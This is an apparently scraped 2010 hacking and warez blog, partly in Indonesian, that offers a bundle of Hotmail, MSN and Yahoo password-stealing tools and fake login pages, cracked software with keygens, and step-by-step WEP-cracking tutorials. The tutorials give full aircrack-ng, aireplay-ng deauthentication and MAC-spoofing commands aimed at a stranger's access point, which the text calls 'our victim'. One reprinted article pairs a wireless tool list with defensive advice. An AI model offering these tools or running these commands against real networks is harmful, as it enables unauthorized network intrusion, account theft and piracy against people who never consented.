The Best collection of Hacking tools available. Includes MSN and Yahoo hack tools.

Main page:
- HOTMAIL HACKING
- YAHOO HACKING
- MSN FUN TOOLS
- FAKE SCREENS/PAGES
- OTHER HACKING TOOLS
- FUN TOOLSPage 1:
MSN Chat Monitor And Sniffer
MSN Password Retriever
MSN Hacker DUC
Head **** HotMail HAck
HotMail Hacker XE Edition
HotMail HAck
HotMAil Hacker
MSN Passwords
MSN Flooder
MSN Sniffer
MSN SPY Lite
HotMail Hacker Gold
HotMail HAcker Final
Give me Ur Pass
HotMail Brute Forcer
MSN PAssword Finder
MSN Password Grabber
Hack MSN Password
Hack HotMAil Evolution
MAgic Password Sender
MSN Locker
HotMail Killer
Hot Freeze
MessenPass
HotMAil Hack !
Ice Cold Reload
HotMail Killer 2
Nuke MSNPage 2:
Yahoo Messenger Login Screen
MSN Messenger 7 Login Screen
MSN Messenger 5 Login Screen
MSN Messenger 4.6 Login Screen
HotMail Login Screen
Fake Web Pages 2
Fake Eeb Pages 1
AOL Killer
Fake Login HotMail
B-S Spy
Saria Fake LoginsPage 3:
Yahoo Password Retrieval
Yacam
Yahoo Cracker
Yahoo Booster
Yahoo Hack!
Yahoo Password Stealer
S-H Yahoo Password SenderPage 4:
NetWork Password Recovery
Net BIOS Name Scanner
FTP Password Hacker
Cable Modem Sniffer
Port Listening XP
Blue Port Scanner
www 2 IP
XP Killer
Sniff Password
Port Scanner
Fast Resolver
Domain Scan
Whois Domain
NetRes View
PHPbb Defacer
Angry IP Scanner
FTP Brute ForcerPage 5:
Hook Tool Box
Smart HAck UpLoader
Remote Anything
Post Sage
PHPbb AttackerPage 6:
Skinner
MSN Bomber Man
Ultimate Nick PopUpz
MSN 7 Universal Patcher
Emoticons Creator
MSN Picture Crawler
Anti Status Bomb
MSN Detector
Multi MSN Loader
Kitle
Protect Lithium
Tray It!
MSN Block Checker
MSN Auto Responder
MSN Virus CleanerDownload and Enjoy hacking....

Download : http://rapidshare.com/files/300434284/w ... ctions.rar

All tutorial with video Hack and Crack for free

2010-01-19T11:05:00.000-08:00

Salam Belajar bersama, jika anda ingin melihat cara Hack dan Crack melalui Video dan gratis ...Silahkan klik disini ( ).
Di jamin anda puas.

all for free tool your downloads, bittorent, , tutorial gratis, final free,computer pc

2010-01-19T10:24:00.000-08:00

Directory Index of Downloads

PC Downloads

Filename	Modified Date	Filesize
bittorrent-15169.exe	April 16, 2009, 3:37 pm	625K
DNA-Setup.exe	December 26, 2008, 7:33 am	338K
BitTorrent-6.3c.exe	November 30, 2009, 9:38 am	2.9M
BitTorrent-6.3b.exe	November 30, 2009, 9:38 am	2.9M
BitTorrent-6.3a.exe	November 30, 2009, 9:38 am	2.9M

all for free tool your downloads.

Crack WEP, WPA, WPA2, hack WLAN, Use Ettercap to Sniff SSH, DOS, and DNS spoof, Easy tutorials!

2010-01-19T06:13:00.000-08:00

http://www.linuxsecuritytutorials.tk My website is a collection of all the hacking, cracking, and attacking tutorials I have made in the last few months. It has full step-by-step,
easy to follow tutorials about how to crack WEP, use ettercap to sniff networks, and reroute users to whatever webpage you like, how to ARP poison, like cain and abel, but better, how to Deny service to users on a ... more.

crack, wep, hacking, linux, hack, denial, of, service, dos, aircrack, ettercap, cain, and, abel, poison, poisoning, arp, man, in, the, middle, mitm, ubuntu, dns, spoof, exploit, lan, wlan, wifi, wireless, wpa, backtrack, blackhat, whitehat, password, Sniff SSH, DOS, and DNS spoof, Easy tutorials!

Search wpa2 crack tutorial backtarck 4 pdf word free ebooks download

2010-01-19T06:10:00.000-08:00

Search wpa2 crack tutorial backtarck 4 pdf word free ebooks download
Find wpa2 crack tutorial backtarck 4 pdf word free ebooks download in this page.
Do you have type "wpa2 crack tutorial backtarck 4 pdf word free ebooks download" at search form? Please Check wpa2 crack tutorial backtarck 4 pdf word free ebooks download again in other pages.

Tags : free audio ebooks download, free download english ebooks, download free ebooks computers, free ebooks download electronics, jsp ebooks free download, free programming ebooks download, google ebooks free download, download free ebooks iphone, free pharma ebooks download, myanmar ebooks free download, linux ebooks free download, architecture ebooks free download, free download ebooks networking, hindi ebooks free download, physics ebooks free download, wpa2 crack tutorial backtrack 4 pdf word free ebooks download wep wpa, wpa2 crack tutorial backtrack 4 pdf word free ebooks download rainbow tables, wpa2 crack tutorial backtrack 4 pdf word free ebooks download remote exploit forums, wpa2 crack tutorial backtrack 4 pdf word free ebooks download aircrack ng, wpa2 crack tutorial backtrack 4 pdf word free ebooks download wpa tkip

Download VMware Workstation 6 Gratis

2010-01-18T02:56:00.000-08:00

VMware Workstation 6 gratis. VMware merupakan software virtual yang fungsinya sama seperti virtualbox, virtual pc, dll. Sudah disertakan crack.

Untuk men'download VMware Workstation 6 + Crack secara gratis, langsung saja klik gambar download dibawah ini :

Download Partition Magic 8.5 + Crack Gratis

2010-01-18T02:53:00.000-08:00

Partition Magic 8.5 gratis + crack. Partition magic merupakan software buatan symantec yang berguna dalam hal pengoperasian partisi harddisk.

Backtrack'er bisa download Partition Magic 8.5 + Crack secara gratis, caranya klik saja gambar download dibawah ini :

Download VirtualBox Gratis

2010-01-18T02:50:00.001-08:00

Dengan VirtualBox Kita dapat menjalankan sistem operasi terpisah dan juga software-software yang terinstall di dalamnya dalam sistem operasi lain (secara bersamaan). contoh: Anda bisa menjalankan windows di dalam linux atau sebaliknya.

VirtualBox dapat berjalan pada sistem (disebut host): Windows, Apple, Linux dan Solaris yang berjalan pada komputer berbasis Intel ataupun AMD. Sedangkan system yang di dukung untuk di virtualisasi kan (disebut guest) secara teori adalah semua sistem berbasis x86 seperti windows, Linux, Solaris, FreeBSD, OS/2, termasuk sistem lawas seperti DOS, Windows 3 hingga 98.

Software ini berguna bagi Anda yang gemar mencoba-coba software tapi tidak ingin system Utama Anda terpengaruh atau bagi Anda yang perlu menggunakan software pada basis sistem berbeda.

Untuk download virtualbox secara gratis, silahkan klik url dibawah ini :

http://www.virtualbox.org/wiki/Downloads.

Cara Burning File ISO BackTrack

2010-01-18T02:48:00.000-08:00

Untuk burning file iso backtrack ke dalam DVD, gunakan software gratis yang namanya BurnCDCC. BurnCDCC ini ukurannya cuma 144 Kb.

BurnCDCC merupakan software ringan yang berfungsi untuk proses burning file iso ke CD / DVD. Tidak perlu diinstal .

Buat backtrack'er yang ingin mendownload, bisa klik gambar dibawah ini :

Untuk cara burning'nya :

- Siapkan File iso backtrack anda dan software BurnCDCC yang barusan anda download.

- Double klik file BURNCDCC.exe.

- Masukkan file iso anda, dengan mengklik tombol Browse.

- Atur Speed'nya sampai Optimal.

- Kalau sudah, klik Start.

Cara Membuat Backtrack LiveUSB

2010-01-18T02:43:00.000-08:00

Untuk membuat backtrack live usb, silahkan anda download / tambahkan software yang bernama unetbootin.

Unetbootin merupakan salah satu software portable gratis yang dapat digunakan untuk keperluan LiveUSB.

Unetbootin ini telah mendukung banyak operating system. Untuk backtrack sendiri, hanya backtrack 3 yang compatible dengan software ini.

Bagi yang mau, silahkan download disini.

Download BackTrack 3 Untuk USB Version

2010-01-18T02:36:00.000-08:00

Gak pakai basa-basi,

Untuk download gratis BackTrack 3 Untuk USB Version, ayo buruan klik gambar di berikut ini :

MD5 : 5d27c768e9c2fef61bbc208c78dadf22
SH1 : 3aceedea0e8e70fff2e7f7a7f3039704014e980f

Download BackTrack 3 Untuk VMWare

2010-01-18T02:33:00.000-08:00

Gak pakai basa-basi,

Untuk download gratis BackTrack 3 VMWare, ayo buruan klik gambar di berikut ini :

MD5 : 94212d3c24cf439644f158d90094ed6a
SH1 : 21c9a3f9658133efff259adbe290723583b4fd82

Ayo Cepat Gratis Download BackTrack 3ada disini

2010-01-18T02:31:00.000-08:00

Gak pakai basa-basi,

Untuk download gratis BackTrack 3, ayo buruan klik gambar di berikut ini :

MD5 : f79cbfbcd25147df32f5f6dfa287c2d9
SH1 : 471f0e41931366517ea8bffe910fb09a815e42c7

Ayo Cepat Gratis Download BackTrack 2 ada disini

2010-01-18T02:30:00.000-08:00

Gak pakai basa-basi,

Untuk download gratis BackTrack 2, ayo buruan klik gambar di berikut ini :

MD5 : 990940d975f13d8418b0daa175560ae0

Ayo Cepat Gratis Download BackTrack 1 ada disini

2010-01-18T02:28:00.000-08:00

Gak pakai basa-basi,

Untuk download gratis BackTrack 1, ayo buruan klik gambar di berikut ini :

MD5 : f52319e4d414fa7bd554d8a1e175f1f5

Penjelasan tentang backtrack

2010-01-18T02:20:00.001-08:00

Backtrack merupakan salah satu distro linux yang merupakan turunan dari slackware yang mana merupakan merger dari whax dan auditor security collection. Backtrack dua dirilis pada tanggal 6 maret 2007 yang memasukkan lebih dari 300 tool security sedangkan versi beta 3 dari backtrack dirilis pada tanggal 14 desember 2007 yang pada rilis ketiga ini lebih difokuskan untuk support hardware. Sedangkan versi backtrack 3 dirilis pada tanggal 19 juni 2008 pada backtrack versi 3 ini memasukkan saint dan maltego sedangkan nessus tidak dimasukkan serta tetap memakai kernel versi 2.6.21.5. Dan yang terbaru yaitu backtrack 4.

Sejarahnya Backtrack

2010-01-18T02:18:00.001-08:00

Sejarah Backtrack :
Backtrack dibuat oleh Mati Aharoni yang merupakan konsultan security dari Israel dan max mosser jadi merupakan kolaborasi komunitas, backtrack sendiri merupakan merger dari whax yang mana whax ini adalah salah satu distro linux yang digunakan untuk test keamanan yang asal dari whax sendiri dari knoppix. Ketika knoppix mencapi versi 3.0 maka dinamakan dengan whax. Dengan whax kita bisa melakukan test securtity dari berbagai jaringan dimana saja . Max mosser merupakan auditor security collection yang menghususkan dirinya untuk melakukan penetrasi keamanan di linux, gabungan dari auditor dan whax ini sendiri menghasilakan 300 tool yang digunakan untuk testing security jaringan. Auditor security collection juga terdapat pada knoppix.

BackTrack 3 Final Release

2010-01-18T01:28:00.001-08:00

BackTrack 3 Final Release

Last Update: 11.02.2009
Description: CD Image
Name:: bt3-final.iso
Size: 728 MB

MD5: f79cbfbcd25147df32f5f6dfa287c2d9

BackTrack 4 Beta Release VMWare Image

2010-01-18T01:27:00.000-08:00

BackTrack 4 Beta Release VMWare Image

Last Update: 11.02.2009
Description: VMware Image
Name: bt4-beta-vm-6.5.1.rar
Size: 1 GB

MD5: 38acdcbaf6c73d7c55180dfea8641e5d

BackTrack 4 Beta Release

2010-01-18T01:26:00.000-08:00

BackTrack 4 Beta Release

Last Update: 11.02.2009
Description: DVD Image
Name:: bt4-beta.iso
Size: 854 MB

MD5: 7d1eb7f4748759e9735fee1b8a17c1d8

BackTrack 4 Pre Release

2010-01-18T01:23:00.001-08:00

BackTrack 4 Pre Release

Last Update: 19.06.2009
Description: DVD Image
Name:: bt4-pre-final.iso
Size: 1390 MB

MD5: b0485da6194d75b30cda282ceb629654

BackTrack 4 Final Release VMWare Image

2010-01-18T01:22:00.000-08:00

BackTrack 4 Final Release VMWare Image

Last Update: 11.01.2010
Description: VM Image Download
Name:: bt4-final-vm.zip
Size: 2000 MB

MD5: 733b47fad1d56d31bc63c16b3706a11c

BackTrack 4 Final Release for free

2010-01-18T01:19:00.000-08:00

BackTrack 4 Final Release

Last Update: 11.01.2010
Description: Image Download
Name:: bt4-final.iso
Size: 1570 MB

MD5: af139d2a085978618dc53cabc67b9269

Cara Mempercepat Download

2010-01-18T01:07:00.000-08:00

Cara Mempercepat Download kamu bisa memakai software download manager. Ini berlaku dua fungsi, yaitu untuk mengorganisir file-file download kamu en memastikan kalau download nggak putus ditengah jalan. Nggak lucu kan kalo kamu lagi download lagu yang besarnya bermega-mega lalu tiba-tiba putus ditengah jalan lalu kamu kudu ngulang lagi dari awal (hehehe ini buat yang biasanya ngenet di warnet ya).

Tergantung dari server dimana kamu download, software download manager ini mampu untuk meresume (melanjutkan file yang terputus di tengah jalan atau di-pause). Rapidshare contohnya, nggak bisa diresume oleh download manager ini, tapi MediaFire bisa.
Software download yang paling mudah digunakan adalah DownThemAll. Ini merupakan software addon firefox, jadi kamu nggak usah install di komputer dan terintegrasi dengan browser Firefox.

Kamu bisa download DownThemAll software manager / accelerator disini. DownThemAll merupakan download manager yang cepat, efisien dan sangat gampang digunakan, karena software ini pintar untuk memantau aktivitas browser, apakah user lagi download file atau tidak dan secara langsung bisa mengambil alih peran download dan mempercepat akses download tersebut.
DownThemAll bakal memakan semua bandwidth yang ada, karenanya kecepatan download akan didorong sampai maksimum. Ini akan mempercepat download kamu, tapi juga bisa membuatbrowser jadi nggak bisa digunain buat browsing karena bandwidthnya termakan semua. Sayangnya DownThemAll nggak ada setting untuk membatasi bandwidth file yang bakal didownload.

Run Backtrack 4 Beta in Windows with VmWare Workstation

2010-01-17T14:46:00.001-08:00

WEP Cracking With backtrack 4

2010-01-17T14:26:00.001-08:00

backtrack 4 Wpa & Wpa2 (Cowpatty y aircrack-ng cracking)

2010-01-17T14:13:00.000-08:00

How To Hack WEP Keys Using Backtrack 4

2010-01-17T14:12:00.000-08:00

TUTORIAL BACKTRACK

2010-01-17T09:17:00.000-08:00

.: Latar Belakang :.

Dewasa ini kemajuan teknologi yang semakin berkembang pesat seiring dengan perkembangan kualitas SDM yang ada, terutama pada perkembangan dunia komputer. Lebih khusus lagi, perkembangan operating sistem yang semakin cepat membuat para pengguna komputer memiliki banyak pilihan untuk mengunakan operating system yang mereka inginkan. Dari mulai operating sistem yang berlisensi (yang harus bayar untuk menggunakan/memiliki) sampai yang open source.

Sementara itu di kalangan akademik yang notabenya pengguna komputer yang selalu mengikuti perkembangan yang ada, tentunya mempunyai kesempatan untuk memilih operating system mana yang ingin digunakan.Selain itu perusahaan pembuat operating system yang berlisensi juga selalu memperbarui produknya agar selalu digunakan oleh khalayak ramai. Itu tidak berbeda dengan yang open source yang dapat kita modifikasi sendiri sesuai kemauan kita.

Selain banyak menghadapi persaingan dari pengguna operating sistem sendiri, pengguna merasa kurang puas terhadap kemampuan yang dimiliki antara system opersai tersebut. Selain itu pihak konsumen akan semakin menuntut kepada Negara agar secepat nya menuju IGOS. Kualitas baik atau tidaknya suatu system operasi itu sendiri ditentukan oleh tiga faktor antara lain bukti keamanan (security), keandalan (reliability), dan kemudahan (usecase / friendly ).

Dari kondisi diatas timbul semacam paradigma pada pengguna itu sendiri. Yang lebih memilih operating system yang gratis dan memiliki security yang handal. Salah satunya adalah Backtrack merupakan distro Linux khusus untuk security yang paling digemari dan BackTrack merupakan CD Live yang berisikan ratusan peralatan “perang” untuk kaum “hacker” yang paling terkenal saat ini. Berbagai tools yang siap pakai sudah ada didalam CD ini sehingga kita tidak perlu lagi repot-repot menginstallnya dan hanya perlu membawa CD ataupun menyimpannya didalam USB untuk melakukan berbagai kegiatan hacking.

Dari uraian masalah tersebut di atas, maka kami tertarik untuk mengambil judul penelitian:

“TUTORIAL BACKTRACK”

.: Rumusan Masalah :.

Berdasarkan uraian latar belakang maka dapat dibuat rumusan masalah sebagai berikut:

Mengapa memakai Backtrack? Apa saja kelebihannya ? bagaimana cara menggunakannya ? dan sejauh mana efektifitasnya dalam menyerang sistim operasi yang berbeda ( contoh : Windows, MacOs ) hal ini menjadi sebuah pertanyaan yang besar. Dimana Backtrack merupakan sebuah Live cd yang berisikan Tools-tools Hacking

.: Tujuan :.

Memudahkan pengguna dalam memahami Backtrack sehingga dengan adanya buku ini biisa memudahkan orang awam untuk dapat menggunakan/menjalankannya.

( Tugas KssJK1 : Senoaji Prabowo & Haried Novriando )

Cara Menjebol Proteksi HotSpot (WEP)

2010-01-17T09:05:00.000-08:00

Pada kali ini kita akan membahas bagaimana cara menjebol HotSpot yang menggunakan WEP (Wired Equivalent Privacy) Keys.Alat yang kita butuhkan adalah :
1. Sebuah Laptop atau komputer PC (tapi ingat jika teman-teman ingin menggunakan komputer PC dijawibkan untuk mempunyai antena kaleng atau wajan bolik)

2.Sebuah Wireless Adapter yang mendukung Mode Monitoring dan Injection.
Lalu apa yang dimaksud dengan Wireless Adapter yang mendukung mode monitoring dan injection ? Perlu anda ketahui, tidak semua Wireless Adapter yang ada dipasaran, maupun yang sudah built in dalam laptop, mendukung mode monitoring dan injection yang diperlukan untuk WEP hacking ini.
Yang perlu anda perhatikan adalah Chip dari Wireless Adapter anda. Chip terbaik dalam melakukan wireless hacking adalah Atheros dan Ralink. Namun Atheros adalah pilihan utama. Tidak banyak wireless adapter yang memiliki chip atheros di Indonesia, anda dapat mencari beberapa merk dibawah ini :

1. 3Com 3CRPAG175B
2.3Com 3CRXJK10075
3.DLINK DWL-G630 Rev C
4.Linksys WPC55AG
5.TrendNET TEW-441PC
6.TrendNET TEW-443PI
7.TP-LINK TL-WN610G

3.Linux Live CD distro : Backtrack 2.0

Jika anda telah memilikinya, maka anda dapat memulai Langkah pertama dalam Wireless Hacking ini yaitu lakukan booting dengan CD Backtrack anda .

Langkah kedua tentu saja, langsung buka console anda dan ketikkan command berikut(saya asumsikan wireless adapter anda berchipset atheros) :
airmon-ng stop ath0
airmon-ng start wifi0
Kedua command ini berguna untuk mengaktifkan mode monitoring dan injection pada wireless adapter anda. Kemudian lanjutkan dengan monitoring jaringan wireless dengan mengetikkan command berikut :
airodump-ng ath0

Akan tampil seluruh jaringan wireless yang terdeteksi seperti diatas. Tampak terlihat Access Point Rek-1 diproteksi dengan WEP Encryption. itulah korban kita. AP Rek-1 diset pada Channel 6 dan memiliki BSSID 00:19:5B:5C:62:92 . Sekarang saatnya melakukan penyerangan.Buka Console baru dan ketikkan :
airodump-ng –channel 6 –bssid 00:19:5B:5C:62:92 -w hasil ath0
Perintah diatas akan mengumpulkan paket data yang dibutuhan untuk proses Cracking.
Selanjutnya lakukan injeksi paket pada Client yang terkoneksi pada AP untuk mendapatkan paket ARP lebih cepat. Bukalah lagi Console baru tanpa menutup console yang sebelumnya dan ketik :
aireplay-ng –arpreplay -b 00:19:5B:5C:62:92 -h 00:19:D2:45:D0:EB ath0
Client yang diserang ini memiliki Mac address 00:19:D2:45:D0:EB (lihat pada screenshot diatas pada tabel station yang terletak dibawah) . Anda tidak menemukan Mac address 00:19:D2:45:D0:EB pada screenshot ? tentu saja karena saat dilakukan screenshot belum terdeteksi
Tidak sabar menunggu ? Untuk mempercepat lagi datangnya ARP , maka kita dapat melakukan serangan Deauthentication untuk memutuskan hubungan Client ke AP sehingga ARP yang biasanya didapat saat awal koneksi client dapat lebih cepat didapat. Bukalah console baru sekali lagi dan ketikkan :
aireplay-ng –deauth 5 -c 00:19:D2:45:D0:EB -a 00:19:5B:5C:62:92 ath0
Hasil dari ketiga perintah ini dapat anda lihat pada screenshot dibawah ini :

Sampai sejauh ini anda telah melakukan pengumpulan paket yang dibutuhkan untuk menjebol WEP Keys. Langkah terakhir yang harus anda lakukan adalah buka console baru lagi dan ketikkan perintah berikut :
aircrack-ng hasil*.cap
atau apabila anda memiliki aircrack versi terbaru anda dapat juga mengetikkan perintah seperti berikut :
aircrack-ptw hasil-01.cap
Dan tunggulah beberapa menit hingga anda mendapatkan key tersebut Maaf Screenshot yang satu ini lupa saya buat, tapi yang pasti saya berhasil melakukannya dalam waktu 2 Jam dengan perintah aircrack-ptw hasil-01.cap .
Tertarik melakukannya ?

sumber : agungsetiawanblog

Backtrack 4 Pre Release

2010-01-17T08:21:00.000-08:00

Backtrack 4 Pre Release

Remote Exploit baru2 ini merilis Backtrack 4 Pre Final,, bagi yang berminat silakan downlload...

Description: DVD Image
Name:: bt4-pre-final.iso
Size: 1390 MB
MD5: b0485da6194d75b30cda282ceb629654

http://mirror.switch.ch/ftp/mirror/backtrack/bt4-pre-final.iso

Tutor dalam bentuk PDF
http://www.offensive-security.com/backtrack4-guide-tutorial.pdf

Video tutornya
http://www.offensive-security.com/videos/backtrack-security-training-video/up-and-running-backtrack.html

Backtrack 4 free download,key,crack and more

2010-01-17T08:09:00.000-08:00

Backtrack 4 Pre-Final
The ultimate cracken/hacking Linux Distro.
- Took 15 minutes to rar.
- Took 15 minutes to upload

DOWNLOAD Backtrack 4

http://rapidshare.com/files/312421832/bt4-pre-final.part01.rar
http://rapidshare.com/files/312423004/bt4-pre-final.part02.rar
http://rapidshare.com/files/312424053/bt4-pre-final.part03.rar
http://rapidshare.com/files/312425077/bt4-pre-final.part04.rar
http://rapidshare.com/files/312426032/bt4-pre-final.part05.rar
http://rapidshare.com/files/312412571/bt4-pre-final.part06.rar
http://rapidshare.com/files/312413386/bt4-pre-final.part07.rar
http://rapidshare.com/files/312413909/bt4-pre-final.part08.rar
http://rapidshare.com/files/312415123/bt4-pre-final.part09.rar
http://rapidshare.com/files/312415634/bt4-pre-final.part10.rar
http://rapidshare.com/files/312416430/bt4-pre-final.part11.rar
http://rapidshare.com/files/312418869/bt4-pre-final.part12.rar
http://rapidshare.com/files/312420481/bt4-pre-final.part13.rar
http://rapidshare.com/files/312420618/bt4-pre-final.part14.rar

Hight Speed Backtrack 4

DOWNLOAD Keygen

Keygen Backtrack 4

DOWNLOAD Serial

Serial Backtrack 4

DOWNLOAD Crack

Crack Backtrack 4

Cracking WPA Keys with Aircrack

2010-01-17T06:05:00.001-08:00

I received an interesting email from my brother in-law today asking me if Aircrack could crack WPA keys. I sent him this link to a how-to tutorial hosted on Wiretapped. It illustrated cracking WPA keys in 10 easy steps in less than 10 minutes. This is why WEP, WPA, and other wireless security protocols should never be used without some type of host identification mechanism.

Essential Wireless Hacking Tools

2010-01-17T05:58:00.001-08:00

By Daniel V. Hoffman, CISSP, CWNA, CEH

Anyone interested in gaining a deeper knowledge of wireless security and exploiting vulnerabilities will need a good set of base tools with which to work.

Fortunately, there are an abundance of free tools available on the Internet. This list is not meant to be comprehensive in nature but rather to provide some general guidance on recommended tools to build your toolkit.

See Dan Hoffman Hack a Blackberry LIVE
at ChicagoCon 2007

Finding Wireless Networks

Locating a wireless network is the first step in trying to exploit it. There are two tools that are commonly used in this regard:
Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be used for site surveys. I actually know of one highly known public wireless hotspot provider that uses this utility for their site surveys.

(NetStumbler Screenshot)

Kismet – One of the key functional elements missing from NetStumbler is the ability to display Wireless Networks that are not broadcasting their SSID. As a potential wireless security expert, you should realize that Access Points are routinely broadcasting this info; it just isn’t being read/deciphered. Kismet will detect and display SSIDs that are not being broadcast which is very critical in finding wireless networks.

(Kismet Screenshot)

Attaching to the Found Wireless Network

Once you’ve found a wireless network, the next step is to try to connect to it. If the network isn’t using any type of authentication or encryption security, you can simply connect to the SSID. If the SSID isn’t being broadcast, you can create a profile with the name of the SSID that is not being broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network is using authentication and/or encryption, you may need one of the following tools.
Airsnort – This is a very easy to use tool that can be used to sniff and crack WEP keys. While many people bash the use of WEP, it is certainly better than using nothing at all. Something you’ll find in using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional tools and strategies that can be used to force the generation of traffic on the wireless network to shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.

(Screenshot of Airsnort in Action)

CowPatty – This tool is used as a brute force tool for cracking WPA-PSK, considered the “New WEP” for home Wireless Security. This program simply tries a bunch of different options from a dictionary file to see if one ends up matching what is defined as the Pre-Shared Key.

(Cowpatty Options Screenshot)

ASLeap – If a network is using LEAP, this tool can be used to gather the authentication data that is being passed across the network, and these sniffed credentials can be cracked. LEAP doesn’t protect the authentication like other “real” EAP types, which is the main reason why LEAP can be broken.

(Asleap Options Screenshot)

Sniffing Wireless Data

Whether you are directly connected to a wireless network or not, if there is wireless network in range, there is data flying through the air at any given moment. You will need a tool to be able to see this data.
Wireshark (formerly Ethereal) – While there has been much debate on the proper way to pronounce this utility, there is no question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and comes with some robust filtering capabilities. It can also be used to sniff-out 802.11 management beacons and probes and subsequently could be used as a tool to sniff-out non-broadcast SSIDs.

(Screenshot of Ethereal in Action)

(Yahoo IM Session being sniffed in Ethereal)

The aforementioned utilities, or similar ones, will be necessities in your own wireless security toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab environment. And cost is no excuse as all of these tools are available freely on the Internet.

Protecting Against These Tools

Just as it’s important to know how to utilize the aforementioned tools, it is important to know best practices on how to secure your Wireless Network Against these tools.
NetStumbler – Do not broadcast your SSID. Ensure your WLAN is protected by using advanced Authentication and Encryption.
Kismet – There’s really nothing you can do to stop Kismet from finding your WLAN, so ensure your WLAN is protected by using advanced Authentication and Encryption
Airsnort – Use a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software update).
Cowpatty – Use a long and complex WPA Pre-Shared Key. This type of key would have less of a chance of residing in a dictionary file that would be used to try and guess your key and/or would take longer. If in a corporate scenario, don’t use WPA with Pre-Shared Key, use a good EAP type to protect the authentication and limit the amount of incorrect guesses that would take place before the account is locked-out. If using certificate-like functionality, it could also validate the remote system trying to gain access to the WLAN and not allow a rogue system access.
ASLeap – Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP type.
Ethereal – Use encryption, so that anything sniffed would be difficult or nearly impossible to break. WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), use application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For corporate users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the machine through an encrypted tunnel that would be encrypted with DES, 3DES or AES.
Questions or comments can be sent to Daniel V. Hoffman, CISSP, CWNA
danielvhoffman@yahoo.com

craking dan hacking backtrack 4 tutorial

2010-01-17T05:49:00.000-08:00

Your webmaster search is: craking dan hacking backtrack 4 tutorial

: Image via Wikipedia

Wireless Hacking with backtrack 3 is easy to do ,
in this article I’d like to guide you in Wireless hacking with backtrack 3. This tutorial is made based on some requests by my subscribers , they’ve been familiar enough with Backtrack 3 , that’s why I made this Wireless Hacking with backtrack 3 tutorial. In order to start the wireless hacking , you need to make sure that you have met these requirements :
- Backtrack 3 new release
- 1 wireless router
- Laptop with wireless card
And let the hack begins :

In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request re injection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, aor connecting to the AP.
Here are some things you need to know before you get confused
When you see this (device) or (bssid) you DON’T put the ( )!!!
(device) = Your wireless card *can be seen by typing in iwconfig EG: eth0, eth1, ath0, ath1
(bssid) = This is the consenting computers bssid *when you start airodump-ng if there is a AP in range it will show up on the left side will look similar to 00:11:22:33:44:55
************************************************************************
Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons home and system. Double click the home icon, rigt click the blank white area and select create new Txt File name it Exidous or what ever you want! click ok, now close the window.
Ok let’s start!
Commands | Meaning
====================
*open up 3 shell konsoles by clicking the little black box next to the start button.
* The first thing were going to do is stop the device aka ethernet card
airmon-ng stop ath0
* Now were going to put the wireless card down, so we can fake a mac adress (to see available wireless cards type, iwconfig
ifconfig (device) down
* Ok now just to make things simpler, so we don’t have to hunt down what our Mac address is
macchanger –mac 00:11:22:33:44:55 (device)
* Now were going to start the wireless card *make it listen for AP’s
airmon-ng start (device)
* Lets start seeing what AP’s are there
airodump-ng (device)
* After you see all the AP’s execute the following command to stop it and copy the bssid
CTRL+C Copy bssid of consenting computer
* Now on to the consenting computer’s AP (were listening in for authentication packets
airodump-ng -c 6 -w Exidous –bssid (Bssid) (device)
* Lets get on with making more Data, and start the injection process
aireplay-ng -l 0 -a (bssid) -h 00:11:22:33:44:55 (device)
* Now were going to inject the router ***this sometimes takes a while to actually inject!
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)
* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV’s for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IV’s for 128 bit encryption
aircrack-ng -n 64 –bssid (bssid) Exidous-01.cap
* Once you crack the wep key you wright it down, and reboot to windows. Now put it in the username and the password with out the :
EG: Wep Key = 33:C7:C6:09:30
When Entered into username and password it will look like this. 33C7C60930
more informations : http://www.blackhat-forums.com/index.php?showforum=30

Cracking WPA-PSK

2010-01-17T05:45:00.000-08:00

As I mentioned in a previous blog, my team is working on a project where we perform a Man-in-the-Middle (MitM) attack on a WEP encrypted wireless network.
The point of the project is to demonstrate how quick and easy it is to hack a WEP encrypted wireless network and to discuss and encourage additional methods of wireless security.

As I searched for useful hack tools I became especially excited about Aircrack. Aircrack is a package of great wireless auditing tools. It includes:

Airodump: 802.11 packet capture program
Aireplay: 802.11 packet injection program
Aircrack: static WEP and WPA-PSK key cracker
Airdecap: decrypts WEP/WPA capture files

RapidShare hack for free account

2010-01-17T05:18:00.001-08:00

1. Hanya menyalin KODE yang di ada di bawah
2. Buka Run dan jalan cmd

3. Salin kode tersebut. ( saya harap anda tahu cara menyalinnya )
4. Sekarang cobalah link rapishare lagi.
@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
exit
Akan tetapi seringlah anda mengeceknya.

HACK MOBILE PHONE YOUR FRIEND

2010-01-17T05:15:00.000-08:00

author : lirva32

Aduh… BeTe banget deh hari ini… karena udah ga tau mau ngapain lagi di Internet….

hampir setiap hari hidupku disibukkan dengan internet…. mungkin sekarang sudah mulai menemukan titik kejenuhan….
Untuk mengurangi kejenuhan… akhirnya aku memutuskan untuk sedikit refreshing dengan permainan2 bluetooth… awal kenal permainan bluetooth hacking dari kang Ammar .a.k.a y3dips.
Awalnya aku males untuk bermain2 hacking pada tingkat bluetooth… tapi racunnya kang Ammar udah menyebar… yang membuatku ketagihan untuk selalu mencoba dan mencoba…. akhirnya kegiatan “BlueJacking” (–nama lain untuk kegiatan hacking terhadap BlutTooth,red) banyak mengisi waktu2 jenuhku kini…

